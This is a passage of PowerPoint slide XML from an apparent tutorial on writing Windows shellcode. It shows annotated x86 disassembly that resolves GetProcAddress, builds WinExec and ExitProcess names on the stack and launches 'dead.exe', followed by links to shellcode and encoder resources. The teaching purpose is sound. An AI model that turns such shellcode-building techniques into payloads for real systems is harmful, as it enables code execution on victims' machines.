              <a:t>00000115  2F                das </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000116  2F                das </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="117"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>62666C            bound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[esi+0x6c]</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="ro-RO"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152400"/>
            <a:ext cx="5486400" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Get function from DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>(WinExec)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2209800"/>
            <a:ext cx="8534400" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000C7  83C41C            add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp,byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +0x1c       ; Clean stack (URL...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000CA  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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ecx,ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              ; ECX = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000CC  5A                pop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                  ; EDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetProcAddress</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000000CD  5B                pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>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000000CE  53                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 ; EBX = kernel32 base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000CF  52                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx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000000D0  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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000000D1  6878656361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0x61636578   ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeca</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000000D6  884C2403          mov [esp+0x3],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cl</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000000DA  6857696E45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0x456e6957   ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WinE</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000000DF  54                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</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000000E0  53                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx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000000E1  FFD2              call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GetProcAddress</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WinExec</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420469"/>
            <a:ext cx="4191000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>C/C++ compiling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="GCC_CompilationProcess.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8298657" cy="3886200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="5634335"/>
            <a:ext cx="4495800" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Shellcode – machine code</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496669"/>
            <a:ext cx="5867400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>WinExec and ExitProcess</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1897082"/>
            <a:ext cx="8534400" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000E3  6A05              push byte +0x5          ; SW_SHOW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000E5  8D4C2418          lea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[esp+0x18]      ; ECX = "dead.exe"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000E9  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx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000000EA  FFD0              call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                ; Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 5)</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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000000EC  83C40C            add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp,byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +0xc                 ; Clean stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000EF  5A                pop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GetProcAddress</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000000F0  5B                pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                           ; kernel32 base </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000F1  6865737361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0x61737365             ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>essa</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000000F6  836C240361        sub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[esp+0x3],byte +0x61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000FB  6850726F63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0x636f7250             ; Proc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000100  6845786974        push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x74697845             ; Exit        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000105  54                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</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00000106  53                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</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00000107  FFD2              call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetProc(Exec)</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00000109  FFD0              call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ExitProcess</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457200"/>
            <a:ext cx="5105400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>More information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1987927"/>
            <a:ext cx="8610600" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcodes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.exploit-db.com/shellcode/</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows x64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</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4"/>
              </a:rPr>
              <a:t>http://mcdermottcybersecurity.com/articles/windows-x64-shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> on ARM Architecture</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5"/>
              </a:rPr>
              <a:t>http://www.exploit-db.com/papers/15652/</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>64-bit Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</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6"/>
              </a:rPr>
              <a:t>http://blog.markloiseau.com/2012/06/64-bit-linux-shellcode/</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 2 EXE</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7"/>
              </a:rPr>
              <a:t>http://www.sandsprite.com/shellcode_2_exe.php</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BETA3 - Multi-format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> encoding tool</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8"/>
              </a:rPr>
              <a:t>http://code.google.com/p/beta3/</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/Socket-reuse</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9"/>
              </a:rPr>
              <a:t>http://www.blackhatlibrary.net/Shellcode/Socket-reuse</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Writing IA32 Restricted Instruction Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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10"/>
              </a:rPr>
              <a:t>http://skypher.com/...shellcode.html.php</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
